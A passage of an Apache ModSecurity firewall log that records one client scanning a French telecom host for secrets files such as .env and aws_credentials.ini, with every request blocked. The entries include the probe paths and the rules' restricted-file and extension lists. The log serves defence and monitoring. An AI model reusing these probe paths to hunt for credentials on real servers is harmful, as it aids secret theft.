[Mon May 11 20:55:51.059841 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agImN_jVc-A-CSptvm1xLQAAAEs"]
[Mon May 11 20:55:51.060018 2026] [security2:error] [pid 1511173:tid 1511187] [client 195.178.110.199:34258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agImN_jVc-A-CSptvm1xLQAAAEs"]
[Mon May 11 20:55:51.393995 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back-end/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/back-end/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tQgAAAIQ"]
[Mon May 11 20:55:51.394142 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/back-end/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tQgAAAIQ"]
[Mon May 11 20:55:51.394327 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/back-end/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tQgAAAIQ"]
[Mon May 11 20:55:51.403344 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/back/.env"] [unique_id "agImNyMeXtzav-mi9SyxTgAAAM4"]
[Mon May 11 20:55:51.403495 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/back/.env"] [unique_id "agImNyMeXtzav-mi9SyxTgAAAM4"]
[Mon May 11 20:55:51.403668 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/back/.env"] [unique_id "agImNyMeXtzav-mi9SyxTgAAAM4"]
[Mon May 11 20:55:51.403724 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backend-api/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tQwAAAIg"]
[Mon May 11 20:55:51.403874 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backend-api/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tQwAAAIg"]
[Mon May 11 20:55:51.404057 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backend-api/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tQwAAAIg"]
[Mon May 11 20:55:51.546603 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/back-api/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tSAAAAIg"]
[Mon May 11 20:55:51.546802 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/back-api/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tSAAAAIg"]
[Mon May 11 20:55:51.547003 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/back-api/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tSAAAAIg"]
[Mon May 11 20:55:51.572633 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /be/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/be/.env"] [unique_id "agImN1NddpkriGUb6ZV2fQAAARE"]
[Mon May 11 20:55:51.572848 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/be/.env"] [unique_id "agImN1NddpkriGUb6ZV2fQAAARE"]
[Mon May 11 20:55:51.573064 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/be/.env"] [unique_id "agImN1NddpkriGUb6ZV2fQAAARE"]
[Mon May 11 20:55:51.578991 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agImNzP5Q_-MBliRCAxnAgAAABI"]
[Mon May 11 20:55:51.579145 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agImNzP5Q_-MBliRCAxnAgAAABI"]
[Mon May 11 20:55:51.579343 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agImNzP5Q_-MBliRCAxnAgAAABI"]
[Mon May 11 20:55:51.579351 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tSQAAAIg"]
[Mon May 11 20:55:51.579527 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tSQAAAIg"]
[Mon May 11 20:55:51.579725 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tSQAAAIg"]
[Mon May 11 20:55:51.615555 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/aws_credentials.ini"] [unique_id "agImN5Yn-x0CHsbEbP2tTgAAAIg"]
[Mon May 11 20:55:51.615823 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/aws_credentials.ini"] [unique_id "agImN5Yn-x0CHsbEbP2tTgAAAIg"]
[Mon May 11 20:55:51.616003 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/aws_credentials.ini"] [unique_id "agImN5Yn-x0CHsbEbP2tTgAAAIg"]
[Mon May 11 20:55:51.623015 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agImN1NddpkriGUb6ZV2fwAAARE"]
[Mon May 11 20:55:51.623175 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agImN1NddpkriGUb6ZV2fwAAARE"]
[Mon May 11 20:55:51.623348 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agImN1NddpkriGUb6ZV2fwAAARE"]
[Mon May 11 20:55:51.639404 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tUAAAAIQ"]
[Mon May 11 20:55:51.639552 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tUAAAAIQ"]
[Mon May 11 20:55:51.639721 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tUAAAAIQ"]
[Mon May 11 20:55:51.724808 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tVAAAAIg"]
[Mon May 11 20:55:51.724982 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tVAAAAIg"]
[Mon May 11 20:55:51.725200 2026] [security2:error] [pid 1502013:tid 1502058] [client 195.178.110.199:34310] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agImN5Yn-x0CHsbEbP2tVAAAAIg"]
[Mon May 11 20:55:51.974738 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agImNzP5Q_-MBliRCAxnBgAAABI"]
[Mon May 11 20:55:51.974899 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agImNzP5Q_-MBliRCAxnBgAAABI"]
[Mon May 11 20:55:51.975081 2026] [security2:error] [pid 1501883:tid 1501903] [client 195.178.110.199:34268] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agImNzP5Q_-MBliRCAxnBgAAABI"]
[Mon May 11 20:55:51.984343 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag 